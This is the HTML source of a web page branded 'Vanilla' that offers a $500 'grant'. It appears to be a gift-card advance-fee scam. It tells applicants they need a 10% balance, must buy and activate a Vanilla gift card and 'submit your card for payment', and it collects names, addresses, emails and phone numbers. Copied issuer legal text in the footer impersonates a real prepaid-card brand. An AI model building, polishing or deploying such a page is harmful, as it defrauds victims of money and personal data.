<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="css/application.css">
    <title>Apply For Grant</title>
</head>
<body>
    <header>
        <div>Vanilla</div>
        <nav> 
            <div id="navbar">   
                <span></span>
                <span></span>
                <span></span>
            </div>
            <ul id="list-link">
                <li id="cancel-bar">&times;</li>
                <li class="nav-link"><a href="index.html">Home </li>
                    <li class="nav-link"><a href="application.html">Apply</a></li>
                    
                    <li class="nav-link"><a href="faq.html">FAQ</a></li>
            </ul>
        </nav>
    </header>

    <section id="application-form">
        <div>
            <h2>Let Vanilla Work for you</h2>
            <h5>Application Form</h5>
        </div>
        <form id="myform">
            <div class="flex-container">
                <input type="text" class="name" placeholder="Firstname">
                <input type="text" class="name" placeholder="Lastname">
            </div>
            <div class="flex-container">       
                <textarea name="" id="" cols="30" rows="10" placeholder="Address  1"></textarea>
                <textarea name="" id="" cols="30" rows="10" placeholder="Address 2"></textarea>
            </div>
            <div class="flex-container">
                <input type="text" placeholder="City">
                <input type="text" placeholder="State">
            </div>
            <div class="flex-container">
                <input type="text" placeholder="Country">
                <input type="text" placeholder="Zip Code">
            </div>
            <div class="flex-container">    
                <p for="">Grant Amount*  (You need a 10% balance of any amount you choose) <br><br>
                 <select name="" id="">
                    <option value="500">$500</option>
                </select></p>
                
            </div>
            <div class="flex-container">  
                <input type="text" placeholder="Email">
                <input type="text" placeholder="Phone Number">
            </div>
            <div class="flex-container">
                
                <p><input type="checkbox" name="" id=""> Do you have a vanilla card? *</p>
                <p>You need to have a Vanilla Card to receive this grant,if you do not have one, you can go and pick up
                    a Vanilla Gift Card at a retailer near you.
                </p>
            </div>
            <div class="flex-container-btn">  
                <button type="submit" >Proceed</button>
            </div>
        </form>
    </section>

    <section id="work-rate">
        <div class="project">
            <h3>Step 1</h3>
            <b>Fill your application, and get your vanilla card ready,
                 choose support funds amount</b>
        </div>
        <div class="project">
            <h3>Step 2</h3>
            <b>After choosing support amount, Activate your card and submit your card for payment</b>
        </div>
        <div class="project">
            <h3>Step 3</h3>
            <b>Once your card has been received and confirmed valid. Payment shall be received
                24-48 hours.
            </b>
        </div>
    </section>




    <section id="footer">
        <div id="vanilla-desc">Vanilla Visa* Gift Cards are issued by TBBK Card Services,Inc., Metabank*,N.A.
            or Sutton Bank, pursuant to a license from Visa U.S.A Inc. Metabank, N.A and Sutton Bank, Members FDIC 
         See the back of your card for issuing bank.
         Vanilla Discover* Gift Cards are issued by tehe Bancorp Bank, Member FDIC. Vanilla Mastercard* Gift Cards are issued
         by the Bancorp Bank, MetaBank N.A. or Sutton Bank pursuant to license by Mastercard International incorporated.
         Mastercard is a registered trademark, and the circles design is a trademark of Mastercard International incorporated. Vanilla
         Bill payment prepaid Visa Cards are issued by TBBK Card Services, inc. pursuant to a license from Visa U.S.A,inc. Vanilla Bill
         payment prepaid Mastercard is issued by the Bancorp Bank pursuant to license by Mastercard International incorporate. Cards may
         be used in the U.S and District of Columbia everywhere CIsa debit cards, Debit Mastercard or Discover cards are accepted. No Cash or ATM access. Terms and
         conditions apply. See Cardholder Agreement for details. Cards ate distributed and serviced by Incomm Financial Services,inc. which is licensed as a money transmitter by the New York state Department of Financial Services. NMLS ID#912772. Colorado, Maryland and Texas

         <p>Customers: View information about addressing complaints regarding our money services business</p>
         <h6>Copyright &copy; 2020. All Rights Reserved.</h6>
         
        </div>
        <div>
            <img src="images/vanilla.jpg" id="card-img" alt="">
        </div>
    </section>

    <script src="js/email.js"></script>
    <script src="js/navbar.js"></script>
</body>
</html>